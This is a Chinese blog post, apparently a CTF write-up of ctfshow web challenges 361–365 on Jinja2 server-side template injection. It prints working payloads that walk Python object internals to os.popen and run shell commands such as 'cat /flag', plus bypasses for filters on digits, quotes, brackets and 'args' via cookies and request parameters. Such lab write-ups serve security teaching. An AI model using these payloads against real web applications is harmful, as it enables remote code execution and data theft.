ctfshow web入门 SSTI

已于 2024-03-25 22:23:44 修改
阅读量195 收藏 1
点赞数 4
文章标签: 前端 服务器 安全
于 2024-03-16 23:48:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79442654/article/details/136772185
版权

361

提示“名字就是考点”

传参点name

  1. 获取字符串的类

    "".__class__

    得到str的类对象。

  2. 获取基类

    "".__class__.__bases__[0]

    这会得到str类的基类列表,其中第一个元素是object类。

  3. 获取object类的所有子类

    "".__class__.__bases__[0].__subclasses__()

    返回一个包含Python中所有类的列表,这些类都是直接或间接从object继承的。

  4. 选择特定的子类

    "".__class__.__bases__[0].__subclasses__()[132]

    选择了列表中的第133个元素(因为索引是从0开始的)。

  5. 访问Popen类的初始化方法的全局变量

    "".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__

    通过访问Popen类的__init__方法的__globals__属性,可以获得一个字典,其中包含Popen类定义时可用的所有全局变量。

  6. 调用popen

    "".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']

    从全局变量字典中获取名为popen的变量

  7. 执行系统命令

    "".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag')

    使用Popen类来执行cat /flag命令,这个命令通常用于读取名为flag的文件。

  8. 读取命令输出

    调用read()方法来读取Popen对象的输出,即cat /flag命令的输出。

payload

"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()

362

传参试试

轮流试试每个数字,发现只有2和3被过滤

而且只要字符串不包括2和3就能显示

使用全角数字进行绕过

关闭使用半角输入模式

“1234567890”

payload:

?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

363

 

数字没有被过滤掉

经过各种字母和符号尝试,发现会过滤“”

试试把“”进行url编码看看

还是会被过滤

但是传参会自动补齐双引号,所以索性不加了

?name={{x.__init__.__globals__[request.args.a].eval(request.args.b)}}&a=__builtins__&b=__import__('os').popen('cat /flag').read()

 364

它将arg过滤掉了,所以没有办法直接GET传参

改用Cookie传

GET传参

?name={{x.__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}}

Cookie:

x1=__builtins__;x2=__import__('os').popen('cat /flag').read()

365

尝试Jinja2模板注入

过滤单双引号、[、args

找一下os

{{x.__class__.__bases__.__getitem__(0).__subclasses__()}}

 在页面内查找

数出来是132

用__getitem__绕过中括号[过滤,request对象绕过引号''""过滤,cookie或者values绕过args过滤

得到:

{{x.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(132).__init__.__globals__.popen(request.cookies.x).read()}}

还有Cookie传参

x=ls /

再传

Cookie:x=tac /f*

 

 

期期颗颗
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Web入门指北1
08-03
Web入门指南旨在帮助初学者了解并踏入Web安全领域。Web方向是网络安全竞赛(CTF)中的一个重要部分,因其不需要深入的系统底层知识或高级数学能力而成为相对较易入门的领域。Web安全的特点在于其涉及的知识点众多且...
ctf刷题 ctfshow【网鼎杯】
weixin_44807430的博客
01-07 2270
纯粹学安全
ctfshow(web入门
qq_62553635的博客
01-15 1624
第三题 根据提示直接bp抓包 发送到repeater查看响应包 得flag
2024年网络安全最全CTFShow-MISC入门篇详细wp(1-56)_ctfshow misc入门,为什么网络安全要采用Binder作为IPC机制
最新发布
2401_84264727的博客
05-11 1020
magicexif元数据编辑器是一款非常专业的照片magicexif元数据编辑器,该软件可以通过分析照片的元数据以及编码特征来计算图像可信度,从而判断照片是否被修改,同时还能对相机的快门次数、镜头参数、光圈档位等进行查看和编辑。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~
CTFShow-Web入门
weixin_58546222的博客
12-04 2315
CTFShow-信息收集
CTFshow菜狗杯-misc-wp(详解 脚本 过程 全)
热门推荐
路baby的博客
02-10 1万+
CTFshow菜狗-misc-wp(详解 脚本 过程 全) 所以misc 杂项签到 损坏的压缩包 谜之栅栏 你会数数吗 你会异或吗flag一分为二 我是谁?? You and me 7.1.05 黑丝白丝还有什么丝? 我吐了你随意这是个什么文件? 抽象画 迅疾响应 我可没有骗你 你被骗了 一闪一闪亮晶晶 一层一层一层地剥开我的◇ 打不开的图片
CTFshow-Web入门-Web1-20 (信息收集完结篇)
m0_61155226的博客
03-07 7722
CTFshow-Web入门-Web11-20 (信息收集完结篇)
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
CTF-WEB入门DOC-2019版1
08-03
【CTF-WEB入门DOC-2019版1】主要涵盖了CTF竞赛与Web安全相关的基础知识和进阶技能,适合对网络安全有兴趣,尤其是希望在Web安全领域发展的人群。以下将详细介绍其中的关键知识点: 一、CTF简介及目标: CTF...
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
Server-Side Template Injection (SSTI) 是一种严重的网络安全漏洞,尤其在现代Web应用程序中,它可能导致远程代码执行(RCE)。2015年,James Kettle在黑帽大会上详细阐述了这种攻击方式,强调了它如何被误认为是跨...
SSTI
03-09
**SSTI(Server-Side Template Injection)**是一种严重的网络安全漏洞,主要出现在使用服务器端模板引擎的Web应用程序中。这种漏洞允许攻击者注入恶意代码到服务器端模板,从而执行任意服务器端代码,获取敏感信息...
ctfshow 每周大挑战 极限命令执行
m0_64815693的博客
02-12 3911
ctfshow 每周大挑战 极限命令执行 wp
ctfshow-ssti
weixin_74660472的博客
04-18 338
ssti漏洞原理ssti服务端模板注入,ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。本文着重对flask模板注入进行浅析。morePython对象的继承,用魔术方法一步步找到可利用的方法去执行。即找到父类。
CTFshow 1-10关
weixin_62369433的博客
11-11 2172
CTFshow 1-10 通关详解
CTFshow-WEB入门-PHP特性(持续更新)
feng的博客
01-20 4978
web89 利用intval的这个特性: 非空的数组会返回1,因此利用数组绕过。 web90 两种方式: ?num=4476a ?num=0x117c web91 考察了preg_match的/m模式。 默认的正则开始"^“和结束”$“只是对于正则字符串如果在修饰符中加上"m”,那么开始和结束将会指字符串的每一行:每一行的开头就是"^",结尾就是"$"。 因此?cmd=php%0a1即可 web92 <?php include("flag.php"); highlight_file(__
CTFshow 菜狗杯 web方向 全
Jay17的博客
09-01 2477
CTFshow 菜狗杯 web方向 全
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1893
ctfshow pwn入门-前置基础pwn13-pwn19
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
Jay17的博客
08-16 3202
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
CTFShow-MISC入门篇详细wp(1-56)
Aluxian_的博客
07-19 1万+
cffshow-misc 入门 wp解析
ctfshow ssti
07-27
CTFShow SSTI(Server-Side Template Injection)是一个与安全相关的话题,它涉及到服务器端模板注入漏洞。在某些情况下,当应用程序接受用户输入并将其作为模板的一部分进行解析时,攻击者可以利用这个漏洞来执行...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值